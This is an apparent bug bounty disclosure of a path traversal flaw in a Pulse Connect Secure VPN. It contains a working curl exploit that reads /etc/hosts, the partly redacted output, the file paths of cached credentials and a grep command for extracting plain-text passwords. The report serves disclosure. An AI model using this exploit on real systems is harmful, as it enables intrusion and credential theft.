10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.973 High
EPSS
Percentile
99.8%
Summary / Description:
█████ is vulnerable to Path Traversal which can lead to remote code execution.
Critical
cURL
command to get the file /etc/hosts
curl --path-as-is -k -D- 'https://███████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#'
## File generated by DSNet::Hosts::update at Thu Aug 1 13:24:40 2019
127.0.0.1 localhost
█████128.141 KMPC1_Node4
█████████252.82 acrcxznxx07d-10███
███████252.74 acrcxznxx06d-10███
███252.67 ODA-SCAN███
█████████252.65 ODA-VIP-1█████████
█████████252.63 ODA-1██████
███252.196 subversion████████
██████252.134 acrcxznxx07d-12██████
██████████252.13 ODA-2████
█████251.16 acdeva0xxb5l010███
████251.15 acdeva0xxb5l009████████
███████251.14 acdeva0xxb5l008████████
█████████250.239 devikrome█████
███████250.216 ws.soa██████
██████████250.192 ac0hxzndb01d-07.rsn.aac████
█████████250.16 devccimm███
██████250.112 devauth████████l devauth████████
████████250.104 ac0hxznap02d-03████████
███████1.235 spex████████
████1.205 auth████████
███1.164 internal████ internal███████
████1.142 ensq██████████ ensq█████
███████0.92 ac0hqa0xxa3b021.rsn.aac█████████
███0.55 g2g███
█████████0.177 Ac0hqa0xxa1b005.rsn.aac█████████
█████64.181 ac0hqsmap13p
████64.142 ac0hqsmxx03p
██████████40.237 emmggb████████
████████40.126 ac0hqapxx25p.rsn.aac████████
██████████221.42 gcrcknox gcrcknox████
█████████220.81 ft1ariss█████
██████220.245 ccimm█████████
██████220.150 ensqrtn████
███████220.145 pthensqtrain██████
██████212.9 acrcea0xxb5l035█████
██████212.64 acrcea0xxb5l034██████
███18.60 questcentral questcentral███
██████████163.35 hrcremedy█████
███████78.107 afrissimt.rs████
██████8.61 netscout███████
████████205.203 ac0hqa0xxb5l007█████
█████████205.202 ac0hqa0xxb5l006██████████
██████205.200 acrtna0xxb5l003█████
███146.8 AC0HQC2A0A3B021.RSN.AAC████████
█████████146.7 AC0HQC2A0A3B020.rsn.aac████████
█████████145.91 ac0hqwsxx04p.rsn.aac█████
█████145.149 caliber11.rsn.aac███████
████145.118 ac0hqwsap06p.rsn.aac██████████
██████144.95 ikrome████ ft1ikrome█████████
████144.91 Auth██████████
█████144.216 ac0hqc2a0a3b010.rsn.aac██████
████197.16 acft1a0xxb5l005███████
███197.15 acft1a0xxb5l004███
████196.62 ft1ccimm██████████
█████████196.28 ft1auth████
███████195.247 ac0hldbxx02t████
███195.246 ac0hldbxx01t█████
████195.195 ac0hxzndb04t-01████
██████195.188 ac0hxznap04t-03█████████
██████████195.158 ac0hxznxx24t-02██████
██████████195.133 ft1internal████████
████████195.127 ac0hxznap03t-03█████████
██████████194.78 ws13t.soa█████ ws14t.soa█████
█████████194.165 ft1ensq███ ac0hxznxx03t-08-ensq_wls1█████████
█████194.119 rmdwebtopft1███████
We can grab any other file on this system:
/data/runtime/mtmp/system
/data/runtime/mtmp/lmdb/dataa/data.mdb
/data/runtime/mtmp/lmdb/dataa/lock.mdb
/data/runtime/mtmp/lmdb/randomVal/data.mdb
/data/runtime/mtmp/lmdb/randomVal/lock.mdb
The VPN user and hashed passwords are stored in the mtmp/system
file, but when users log into the application, it caches the plain-text password into dataa/data.mdb
.
grep 'password@9' data.mdb -a
will get you a load of plain-text passwords
████████
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101
Update the Pulse Connect Secure VPN
Critical, an attacker can get code execution with this vulnerability.
https://hackerone.com/reports/591295
Thanks,
Corben (@cdl)
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.973 High
EPSS
Percentile
99.8%